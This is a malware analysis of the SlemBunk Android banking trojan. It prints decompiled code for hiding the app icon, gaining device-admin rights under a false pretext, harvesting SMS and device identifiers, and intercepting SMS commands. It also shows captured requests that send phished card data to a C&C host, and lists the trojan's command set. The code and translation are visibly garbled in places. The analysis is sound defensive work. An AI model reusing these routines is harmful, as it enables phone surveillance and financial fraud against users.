Analysis of SlemBunk Trojan Samples

Analysis of SlemBunk Trojan Samples

 

Reading: 584

SlemBunk was first discovered by FireEye. Later, some other security companies also found that the author had the honor to get the sample and analyzed the Trojan horse to find that its design was superb and can be further evolved on this basis. This sample is forged into some other commonly used android applications, deceiving users to input credit card-related sensitive information. Next we will analyze it step by step.

1. malicious behaviors: 1.1 lock screen control

The Control Power status is PARTIAL_WAKE_LOCK. In this status, the cpu is still running even if it is shut down until the code is released.

Java
Public void onCreate (){
Super. onCreate ();
This. mWakeLock = this. getSystemService ("power"). newWakeLock (1, "MyWakeLock"); // in PARTIAL_WAKE_LOCK mode regardless of the power off
This. mWakeLock. acquire ();
}

1.2 device administrator permissions

Obtain the permission of the device administrator. If you do not have the permission of the device administrator, an interface is displayed for confirmation. DEVICE_ADMIN is the corresponding component. ADD_EXPLANTION provides explanations for users.

Java
Public void checkDeviceAdmin (){
ComponentName v0 = new ComponentName (Context) this), MyDeviceAdminReceiver. class );
If (! This. deviceManager. isAdminActive (v0 )){
Intent v1 = new Intent ("android. app. action. ADD_DEVICE_ADMIN ");
V1. putExtra ("android. app. extra. DEVICE_ADMIN", (Parcelable) v0 ));
V1. putExtra ("android. app. extra. ADD_EXPLANATION", "Get video codec access ");
This. startActivity (v1 );
}
}

1.3 hide icon

After the application is installed and the device management permission is activated, the icon is hidden. The code of the interesting hidden icon contains a small section of hidden code, which may be hard to read for smali, however, after the code is decompiled into java, the Code is a piece of cake.

Java
If ("3". equals ("3") | ("3". equals ("1 "))){
This. getPackageManager (). setComponentEnabledSetting (new ComponentName (Context) this), Main. class), 2, 1 );

1.4 scheduled tasks

Java
Private void scheduleLaunch (){
Calendar v0 = Calendar. getInstance ();
V0.add (12, this. restartTimeMinutes );
Intent v1 = new Intent ("com. slempo. service. activities. HTMLStart ");
V1. putExtra ("values", this. getIntent (). getStringExtra ("values "));
This. am. set (0, v0.gettimeinmillis (), PendingIntent. getBroadcast (Context) this), 0, v1, 0 ));
}

1.5 obtain the running application

Slembunk Trojan will decide whether to enable credit card spoofing page based on the currently running application

Java
Private String getTopRunning (){
List v1 = this. getSystemService ("activity"). getRunningTasks (1 );
String v3 =! V1.isEmpty ()? V1.get (0). topActivity. getPackageName ():"";
Return v3;
}

1.6 retrieve SMS records

Java
Public static String readMessagesFromDeviceDB (Context context ){
Cursor v8;
Uri v1 = Uri. parse ("content: // sms/inbox ");
String [] v2 = new String [] {"_ id", "address", "body", "date "};
JSONArray v12 = new JSONArray ();
Try {
V8 = context. getContentResolver (). query (v1, v2, null );
If (v8! = Null ){
If (! V8.moveToFirst ()){
Goto label_55;
}

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 do {String v6 = v8.getString (v8.getColumnIndex ("address ")); string v7 = v8.getString (v8.getColumnIndex ("body"); String v9 = new SimpleDateFormat ("dd-MM-yyyy HH: mm: ss", Locale. US ). format (new Date (Long. parseLong (v8.getString (v8.getColumnIndex ("date"); JSONObject v13 = new JSONObject (); v13. put ("from", v6); v13. put ("body ", v7); v13. put ("date", v9); v12. put (v13); if (v8.moveToNext () {continue;} break;} while (true );}}

 

1.7 obtain the phone number

Java
Public static String getPhoneNumber (Context context ){
String v0 = context. getSystemService ("phone"). getLine1Number ();
If (v0 = null | (v0.equals (""))){
V0 = "";
}

1 2 3 return v0;} 1.8 get DeviceID

Java
Public static String getDeviceId (Context context ){
String v1;
String v0 = context. getSystemService ("phone"). getDeviceId ();
If (v0.equals ("") | v0 = null | (v0.equals ("000000000000000 "))){
V0 = Settings $ Secure. getString (context. getContentResolver (), "android_id ");
If (v0! = Null &&! V0.equals ("")){
Return v0;
}

1 2 3 4 5 6 7 8 9 10 11 12 13 14 v0 = Build. SERIAL; if (v0! = Null &&! V0.equals ("")&&! V0.20.signorecase ("unknown") {return v0 ;}v1 = "not available" ;}else {v1 = v0 ;}return v1 ;}1.9 set boot startup

Trojan will be set to boot and listen to the external SD card. After the SD card is ready, it will also be started.

Xml

 

1.10 listen for text messages

The Trojan sends cc commands by text message. The following AndroidMenifest. xml file shows that the trojan listens to the text message application and has higher permissions than the system text message application.

Xml
<Cycler android: enabled = "true" android: exported = "true" android: name = ". riejkmdcwepoksmieru">


 

The onReceive method of recevier is as follows:

Java
Public void onReceive (Context context, Intent intent ){
SharedPreferences v8 = context. getSharedPreferences ("AppPrefs", 0 );
New HashSet ();
Try {
Object v1 = DATAWraper. deserialize (v8. getString ("BLOCKED_NUMBERS", DATAWraper. serialize (
New HashSet ())));
}
Catch (Exception v2 ){
V2. printStackTrace ();
}

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 19 20 21 22 23 24 25 26 Map v3 = SendSMSRecevier. retrieveMessages (intent); Iterator v10 = v3.keySet (). iterator (); while (v10.hasNext () {Object v7 = v10.next (); CommandCenter v6 = new CommandCenter (v3. get (v7), "", context ); if (v6.processCommand () {this. abortBroadcast (); continue;} boolean v4 = v6.needToInterceptIncoming (); boolean v5 = v6.ne EdToListen (); if (! V4 &&! (HashSet) v1). contains (v7) {if (! V5) {continue;} SendData. sendListenedIncomingSMS (context, v3. get (v7), (String) v7); continue;} SendData. sendInterceptedIncomingSMS (context, v3. get (v7), (String) v7); this. abortBroadcast ();}}

 

2 Trojan Workflow

Trojan in AndroidManifest. SMS_RECEIVED, ACTION_EXTERNAL_APPLICATIONS_AVAILABLE, BOOT_COMPLETED, DEVICE_ADMIN_ENABLED, com. slempo. service. activities. HTMLStart these five actions register several activities and a service at the same time. In addition to the main activity, the service is responsible for starting the activity and requesting device management permissions. The code process is as follows:

The MainServiceStart service will be started in the main activity. This service will start three threads for periodic round robin to determine whether the current application starts the pseudo credit card interface; Request the deviceAdmin permission; Determine whether the command starts the corresponding pseudo interface; send sensitive information such as phone number and ime. The request for sending sensitive information is as follows:

POST, HTTP, 1.1
Content-Length: 481
Content-Type: text/plain; charset = UTF-8
Host: 181.174.164.25: 2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"OS": "4.0.4", "model": "Unknown sdk", "phone number": "15555215554", "apps": ["com. android. gesture. builder "," com. android. widgetpreview "," com. example. android. apis "," com. example. android. livecubes"

, "Com. example. android. softkeyboard", "com. joeykrim. rootcheck", "de. robv. android. xposed. installer"

, "De. robv. android. xposed. installer. staticbusybox"

, "Eu. chainfire. supersu "," org. slempo. service "]," imei ":" 8f986e65d50f299a "," client number ":" 3 "," type ":" device info "," operator ":" 310260 ", "country": "US "}

As mentioned above, Trojan Horse determines whether to start the pseudo credit card page based on the currently running application. The pseudo interface is as follows:

 

The trojan author strictly checks the above user information. First, the credit card information must be valid, and the expiration time must be between 2014 and 2020. The credit card address information page is displayed, there is a strict association between the zip code and the phone number. After you fill in all the information, it will be sent to the c & c host. The request is as follows:

POST, HTTP, 1.1
Content-Length: 401
Content-Type: text/plain; charset = UTF-8
Host: 181.174.164.25: 2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"Data": {"additional information": {"old vbv password": "123456", "vbv password": "qwerty"}, "type ": "card information", "card": {"cvc": "393", "month": "12", "year": "15", "number ": "4024 0238 6573 0515"}, "billing address": {"date of birth": "01.03.1990", "phone number": "212-925-2355 ", "street address": "dalianganjinzi", "zip code": "10002", "phone prefix": "+ 1", "name on card": "Zhanghua "}}, "type": "user data", "code": "-1 "}

Appendix c & c Instructions

CommandCenter. commands. add ("# intercept_sms_start ");
CommandCenter. commands. add ("# intercept_sms_stop ")
CommandCenter. commands. add ("# block_numbers ");
CommandCenter. commands. add ("# unblock_all_numbers ");
CommandCenter. commands. add ("# unblock_numbers ");
CommandCenter. commands. add ("# lock ");
CommandCenter. commands. add ("# unlock ");
CommandCenter. commands. add ("# send" + "_ sms ");
CommandCenter. commands. add ("# forward" + "_ CILS ");
CommandCenter. commands. add ("# disable_forward_cils ");
CommandCenter. commands. add ("# control_number ");
CommandCenter. commands. add ("# update_html ");
CommandCenter. commands. add ("# show_html ");
CommandCenter. commands. add ("# wipe_data ");